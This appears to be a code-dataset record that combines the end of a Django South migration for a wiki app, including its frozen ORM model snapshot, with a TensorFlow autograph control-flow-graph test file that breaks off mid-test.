        """Reverts the migration: drop the column added in forwards()."""
        # Deleting field 'Revision.tags'
        db.delete_column('wiki_revision', 'tags')

    # Frozen ORM snapshot South uses to reconstruct model state at this point
    # in history. Auto-generated; do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'tidings.watch': {
            'Meta': {'object_name': 'Watch'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'db_index': 'True', 'max_length': '75', 'null': 'True', 'blank': 'True'}),
            'event_type': ('django.db.models.fields.CharField', [], {'max_length': '30', 'db_index': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
            'secret': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
        },
        'taggit.tag': {
            'Meta': {'object_name': 'Tag'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'})
        },
        'taggit.taggeditem': {
            'Meta': {'object_name': 'TaggedItem'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
            'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
        },
        'wiki.document': {
            'Meta': {'unique_together': "(('parent', 'locale'), ('slug', 'locale'))", 'object_name': 'Document'},
            'category': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
            'current_revision': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'current_for+'", 'null': 'True', 'to': "orm['wiki.Revision']"}),
            'html': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_localizable': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'is_template': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'locale': ('kuma.core.fields.LocaleField', [], {'default': "'en-US'", 'max_length': '7', 'db_index': 'True'}),
            'mindtouch_page_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'translations'", 'null': 'True', 'to': "orm['wiki.Document']"}),
            'related_documents': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['wiki.Document']", 'through': "orm['wiki.RelatedDocument']", 'symmetrical': 'False'}),
            'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
        },
        'wiki.editortoolbar': {
            'Meta': {'object_name': 'EditorToolbar'},
            'code': ('django.db.models.fields.TextField', [], {'max_length': '2000'}),
            'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_toolbars'", 'to': "orm['auth.User']"}),
            'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'wiki.firefoxversion': {
            'Meta': {'unique_together': "(('item_id', 'document'),)", 'object_name': 'FirefoxVersion'},
            'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'firefox_version_set'", 'to': "orm['wiki.Document']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'item_id': ('django.db.models.fields.IntegerField', [], {})
        },
        'wiki.helpfulvote': {
            'Meta': {'object_name': 'HelpfulVote'},
            'anonymous_id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
            'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'poll_votes'", 'null': 'True', 'to': "orm['auth.User']"}),
            'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'poll_votes'", 'to': "orm['wiki.Document']"}),
            'helpful': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user_agent': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
        },
        'wiki.operatingsystem': {
            'Meta': {'unique_together': "(('item_id', 'document'),)", 'object_name': 'OperatingSystem'},
            'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'operating_system_set'", 'to': "orm['wiki.Document']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'item_id': ('django.db.models.fields.IntegerField', [], {})
        },
        'wiki.relateddocument': {
            'Meta': {'ordering': "['-in_common']", 'object_name': 'RelatedDocument'},
            'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_from'", 'to': "orm['wiki.Document']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_common': ('django.db.models.fields.IntegerField', [], {}),
            'related': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_to'", 'to': "orm['wiki.Document']"})
        },
        'wiki.reviewtag': {
            'Meta': {'object_name': 'ReviewTag'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'})
        },
        'wiki.reviewtaggedrevision': {
            'Meta': {'object_name': 'ReviewTaggedRevision'},
            'content_object': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Revision']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.ReviewTag']"})
        },
        'wiki.revision': {
            'Meta': {'object_name': 'Revision'},
            'based_on': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Revision']", 'null': 'True', 'blank': 'True'}),
            'comment': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'content': ('django.db.models.fields.TextField', [], {}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_revisions'", 'to': "orm['auth.User']"}),
            'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['wiki.Document']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_approved': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'is_mindtouch_migration': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'keywords': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'mindtouch_old_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'db_index': 'True'}),
            'reviewed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'reviewer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviewed_revisions'", 'null': 'True', 'to': "orm['auth.User']"}),
            'significance': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
            'summary': ('django.db.models.fields.TextField', [], {}),
            'tags': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'})
        }
    }

    complete_apps = ['wiki']
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for cfg module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.pyct import cfg
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.platform import test
class CountingVisitor(cfg.GraphVisitor):
  """Graph visitor that records how many times each AST node was visited."""

  def __init__(self, graph):
    super(CountingVisitor, self).__init__(graph)
    self.counts = {}

  def init_state(self, _):
    # No per-node traversal state is needed; tallies live in self.counts.
    return None

  def visit_node(self, node):
    seen_so_far = self.counts.get(node.ast_node, 0)
    self.counts[node.ast_node] = seen_so_far + 1
    return False  # visit only once
class GraphVisitorTest(test.TestCase):
  """Tests that GraphVisitor traversals cover exactly the reachable nodes."""

  def _build_cfg(self, fn):
    """Parses fn and returns (cfgs, ast_node) for assertions."""
    node, _ = parser.parse_entity(fn, future_features=())
    cfgs = cfg.build(node)
    return cfgs, node

  def test_basic_coverage_forward(self):
    def test_fn(a):
      while a > 0:
        a = 1
        break
        return a  # pylint:disable=unreachable
      a = 2
    graphs, node = self._build_cfg(test_fn)
    graph, = graphs.values()
    visitor = CountingVisitor(graph)
    visitor.visit_forward()
    self.assertEqual(visitor.counts[node.args], 1)
    self.assertEqual(visitor.counts[node.body[0].test], 1)
    self.assertEqual(visitor.counts[node.body[0].body[0]], 1)
    self.assertEqual(visitor.counts[node.body[0].body[1]], 1)
    # The return node should be unreachable in forward direction.
    self.assertNotIn(node.body[0].body[2], visitor.counts)
    self.assertEqual(visitor.counts[node.body[1]], 1)

  def test_basic_coverage_reverse(self):
    def test_fn(a):
      while a > 0:
        a = 1
        break
        return a  # pylint:disable=unreachable
      a = 2
    graphs, node = self._build_cfg(test_fn)
    graph, = graphs.values()
    visitor = CountingVisitor(graph)
    visitor.visit_reverse()
    self.assertEqual(visitor.counts[node.args], 1)
    self.assertEqual(visitor.counts[node.body[0].test], 1)
    self.assertEqual(visitor.counts[node.body[0].body[0]], 1)
    self.assertEqual(visitor.counts[node.body[0].body[1]], 1)
    # BUG FIX: this was assertTrue(value, 1), which only checked truthiness
    # (the 1 was silently taken as the failure message). The return node is
    # reachable in reverse, so its visit count must equal exactly 1, matching
    # the assertEqual pattern used on the surrounding lines.
    self.assertEqual(visitor.counts[node.body[0].body[2]], 1)
    self.assertEqual(visitor.counts[node.body[1]], 1)
class AstToCfgTest(test.TestCase):
def _build_cfg(self, fn):
node, _ = parser.parse_entity(fn, future_features=())
cfgs = cfg.build(node)
return cfgs
def _repr_set(self, node_set):
return frozenset(repr(n) for n in node_set)
def _as_set(self, elements):
if elements is None:
return frozenset()
elif isinstance(elements, str):
return frozenset((elements,))
else:
return frozenset(elements)
  def assertGraphMatches(self, graph, edges):
    """Tests whether the CFG contains the specified edges.

    Args:
      graph: a cfg.Graph.
      edges: iterable of (prev, node_repr, next_) triples; prev and next_ may
        each be None, a single repr string, or an iterable of repr strings.
    """
    for prev, node_repr, next_ in edges:
      matched = False
      # Nodes are identified by repr; neighbor sets are compared as sets
      # because edge order is not significant.
      for cfg_node in graph.index.values():
        if repr(cfg_node) == node_repr:
          if (self._as_set(prev) == frozenset(map(repr, cfg_node.prev)) and
              self._as_set(next_) == frozenset(map(repr, cfg_node.next))):
            matched = True
            break
      if not matched:
        self.fail(
            'match failed for node "%s" in graph:\n%s' % (node_repr, graph))
  def assertStatementEdges(self, graph, edges):
    """Tests whether the CFG contains the specified statement edges."""
    # Each entry of `edges` is (prev_node_reprs, node_repr, next_node_reprs),
    # where node_repr names a statement AST node as "ClassName:lineno".
    for prev_node_reprs, node_repr, next_node_reprs in edges:
      matched = False
      partial_matches = []
      # stmt_next and stmt_prev must index exactly the same statements.
      self.assertSetEqual(
          frozenset(graph.stmt_next.keys()), frozenset(graph.stmt_prev.keys()))
      for stmt_ast_node in graph.stmt_next:
        ast_repr = '%s:%s' % (stmt_ast_node.__class__.__name__,
                              stmt_ast_node.lineno)
        if ast_repr == node_repr:
          actual_next = frozenset(map(repr, graph.stmt_next[stmt_ast_node]))
          actual_prev = frozenset(map(repr, graph.stmt_prev[stmt_ast_node]))
          # Remember near-misses so the failure message is informative.
          partial_matches.append((actual_prev, node_repr, actual_next))
          if (self._as_set(prev_node_reprs) == actual_prev and
              self._as_set(next_node_reprs) == actual_next):
            matched = True
            break
      if not matched:
        self.fail('edges mismatch for %s: %s' % (node_repr, partial_matches))
  def test_straightline(self):
    def test_fn(a):
      a += 1
      a = 2
      a = 3
      return

    graph, = self._build_cfg(test_fn).values()

    # Edge tuples are (prev, node, next); None means no edge on that side.
    self.assertGraphMatches(
        graph,
        (
            (None, 'a', 'a += 1'),
            ('a += 1', 'a = 2', 'a = 3'),
            ('a = 2', 'a = 3', 'return'),
            ('a = 3', 'return', None),
        ),
    )
def test_straightline_no_return(self):
def test_fn(a, b):
a = b + 1
a += max(a)
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a, b', 'a = b + 1'),
('a = b + 1', 'a += max(a)', None),
),
)
def test_unreachable_code(self):
def test_fn(a):
return
a += 1 # pylint:disable=unreachable
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', 'return'),
('a', 'return', None),
(None, 'a += 1', None),
),
)
def test_if_straightline(self):
def test_fn(a):
if a > 0:
a = 1
else:
a += -1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', '(a > 0)'),
('(a > 0)', 'a = 1', None),
('(a > 0)', 'a += -1', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', None),),
)
def test_branch_nested(self):
def test_fn(a):
if a > 0:
if a > 1:
a = 1
else:
a = 2
else:
if a > 2:
a = 3
else:
a = 4
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', '(a > 0)'),
('a', '(a > 0)', ('(a > 1)', '(a > 2)')),
('(a > 0)', '(a > 1)', ('a = 1', 'a = 2')),
('(a > 1)', 'a = 1', None),
('(a > 1)', 'a = 2', None),
('(a > 0)', '(a > 2)', ('a = 3', 'a = 4')),
('(a > 2)', 'a = 3', None),
('(a > 2)', 'a = 4', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'If:2', None),
('(a > 0)', 'If:3', None),
('(a > 0)', 'If:8', None),
),
)
def test_branch_straightline_semi(self):
def test_fn(a):
if a > 0:
a = 1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', '(a > 0)'),
('a', '(a > 0)', 'a = 1'),
('(a > 0)', 'a = 1', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', None),),
)
def test_branch_return(self):
def test_fn(a):
if a > 0:
return
else:
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', ('return', 'a = 1')),
('(a > 0)', 'a = 1', 'a = 2'),
('(a > 0)', 'return', None),
('a = 1', 'a = 2', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', 'a = 2'),),
)
def test_branch_return_minimal(self):
def test_fn(a):
if a > 0:
return
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', 'return'),
('(a > 0)', 'return', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', None),),
)
def test_while_straightline(self):
def test_fn(a):
while a > 0:
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('a = 1', 'a = 2')),
('(a > 0)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'While:2', 'a = 2'),),
)
def test_while_else_straightline(self):
def test_fn(a):
while a > 0:
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('a = 1', 'a = 2')),
('(a > 0)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'While:2', 'a = 3'),),
)
def test_while_else_continue(self):
def test_fn(a):
while a > 0:
if a > 1:
continue
else:
a = 0
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'continue', 'a = 1'), '(a > 0)', ('(a > 1)', 'a = 2')),
('(a > 0)', '(a > 1)', ('continue', 'a = 0')),
('(a > 1)', 'continue', '(a > 0)'),
('a = 0', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'If:3', ('a = 1', '(a > 0)')),
),
)
def test_while_else_break(self):
def test_fn(a):
while a > 0:
if a > 1:
break
a = 1
else:
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('(a > 1)', 'a = 2')),
('(a > 0)', '(a > 1)', ('break', 'a = 1')),
('(a > 1)', 'break', 'a = 3'),
('(a > 1)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
(('break', 'a = 2'), 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'If:3', ('a = 1', 'a = 3')),
),
)
def test_while_else_return(self):
def test_fn(a):
while a > 0:
if a > 1:
return
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('(a > 1)', 'a = 2')),
('(a > 0)', '(a > 1)', ('return', 'a = 1')),
('(a > 1)', 'return', None),
('(a > 1)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'If:3', 'a = 1'),
),
)
def test_while_nested_straightline(self):
def test_fn(a):
while a > 0:
while a > 1:
a = 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), '(a > 0)', ('(a > 1)', 'a = 3')),
(('(a > 0)', 'a = 1'), '(a > 1)', ('a = 1', 'a = 2')),
('(a > 1)', 'a = 1', '(a > 1)'),
('(a > 1)', 'a = 2', '(a > 0)'),
('(a > 0)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'While:3', 'a = 2'),
),
)
def test_while_nested_continue(self):
def test_fn(a):
while a > 0:
while a > 1:
if a > 3:
continue
a = 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), '(a > 0)', ('(a > 1)', 'a = 3')),
(('(a > 0)', 'continue', 'a = 1'), '(a > 1)', ('(a > 3)', 'a = 2')),
('(a > 1)', '(a > 3)', ('continue', 'a = 1')),
('(a > 3)', 'continue', '(a > 1)'),
('(a > 3)', 'a = 1', '(a > 1)'),
('(a > 1)', 'a = 2', '(a > 0)'),
('(a > 0)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'While:3', 'a = 2'),
('(a > 1)', 'If:4', ('a = 1', '(a > 1)')),
),
)
def test_while_nested_break(self):
def test_fn(a):
while a > 0:
while a > 1:
if a > 2:
break
a = 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(graph, (
(('a', 'a = 2'), '(a > 0)', ('(a > 1)', 'a = 3')),
(('(a > 0)', 'a = 1'), '(a > 1)', ('(a > 2)', 'a = 2')),
('(a > 1)', '(a > 2)', ('break', 'a = 1')),
('(a > 2)', 'break', 'a = 2'),
('(a > 2)', 'a = 1', '(a > 1)'),
(('(a > 1)', 'break'), 'a = 2', '(a > 0)'),
('(a > 0)', 'a = 3', None),
))
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'While:3', 'a = 2'),
('(a > 1)', 'If:4', ('a = 1', 'a = 2')),
),
)
def test_for_straightline(self):
def test_fn(a):
for a in range(0, a):
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('a = 1', 'a = 2')),
('range(0, a)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'For:2', 'a = 2'),),
)
def test_for_else_straightline(self):
def test_fn(a):
for a in range(0, a):
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('a = 1', 'a = 2')),
('range(0, a)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'For:2', 'a = 3'),),
)
def test_for_else_continue(self):
def test_fn(a):
for a in range(0, a):
if a > 1:
continue
else:
a = 0
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'continue', 'a = 1'), 'range(0, a)', ('(a > 1)', 'a = 2')),
('range(0, a)', '(a > 1)', ('continue', 'a = 0')),
('(a > 1)', 'continue', 'range(0, a)'),
('(a > 1)', 'a = 0', 'a = 1'),
('a = 0', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'If:3', ('a = 1', 'range(0, a)')),
),
)
def test_for_else_break(self):
def test_fn(a):
for a in range(0, a):
if a > 1:
break
a = 1
else:
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('(a > 1)', 'a = 2')),
('range(0, a)', '(a > 1)', ('break', 'a = 1')),
('(a > 1)', 'break', 'a = 3'),
('(a > 1)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
(('break', 'a = 2'), 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'If:3', ('a = 1', 'a = 3')),
),
)
def test_for_else_return(self):
def test_fn(a):
for a in range(0, a):
if a > 1:
return
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('(a > 1)', 'a = 2')),
('range(0, a)', '(a > 1)', ('return', 'a = 1')),
('(a > 1)', 'return', None),
('(a > 1)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'If:3', 'a = 1'),
),
)
def test_for_nested_straightline(self):
def test_fn(a):
for a in range(0, a):
for b in range(1, a):
b += 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), 'range(0, a)', ('range(1, a)', 'a = 3')),
(('range(0, a)', 'b += 1'), 'range(1, a)', ('b += 1', 'a = 2')),
('range(1, a)', 'b += 1', 'range(1, a)'),
('range(1, a)', 'a = 2', 'range(0, a)'),
('range(0, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'For:3', 'a = 2'),
),
)
def test_for_nested_continue(self):
def test_fn(a):
for a in range(0, a):
for b in range(1, a):
if a > 3:
continue
b += 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), 'range(0, a)', ('range(1, a)', 'a = 3')),
(('range(0, a)', 'continue', 'b += 1'), 'range(1, a)',
('(a > 3)', 'a = 2')),
('range(1, a)', '(a > 3)', ('continue', 'b += 1')),
('(a > 3)', 'continue', 'range(1, a)'),
('(a > 3)', 'b += 1', 'range(1, a)'),
('range(1, a)', 'a = 2', 'range(0, a)'),
('range(0, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'For:3', 'a = 2'),
('range(1, a)', 'If:4', ('b += 1', 'range(1, a)')),
),
)
def test_for_nested_break(self):
def test_fn(a):
for a in range(0, a):
for b in range(1, a):
if a > 2:
break
b += 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), 'range(0, a)', ('range(1, a)', 'a = 3')),
(('range(0, a)', 'b += 1'), 'range(1, a)', ('(a > 2)', 'a = 2')),
('range(1, a)', '(a > 2)', ('break', 'b += 1')),
('(a > 2)', 'break', 'a = 2'),
('(a > 2)', 'b += 1', 'range(1, a)'),
(('range(1, a)', 'break'), 'a = 2', 'range(0, a)'),
('range(0, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'For:3', 'a = 2'),
('range(1, a)', 'If:4', ('b += 1', 'a = 2')),
),
)
def test_complex(self):
def test_fn(a):
b = 0
while a > 0:
for b in range(0, a):
if a > 2:
break
if a > 3:
if a > 4:
continue
else:
max(a)
break
b += 1
else: # for b in range(0, a):
return a
a = 2
for a in range(1, a):
return b
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('b = 0', 'a = 2'), '(a > 0)', ('range(0, a)', 'range(1, a)')),
(
('(a > 0)', 'continue', 'b += 1'),
'range(0, a)',
('(a > 2)', 'return a'),
),
('range(0, a)', '(a > 2)', ('(a > 3)', 'break')),
('(a > 2)', 'break', 'a = 2'),
('(a > 2)', '(a > 3)', ('(a > 4)', 'b += 1')),
('(a > 3)', '(a > 4)', ('continue', 'max(a)')),
('(a > 4)', 'max(a)', 'break'),
('max(a)', 'break', 'a = 2'),
('(a > 4)', 'continue', 'range(0, a)'),
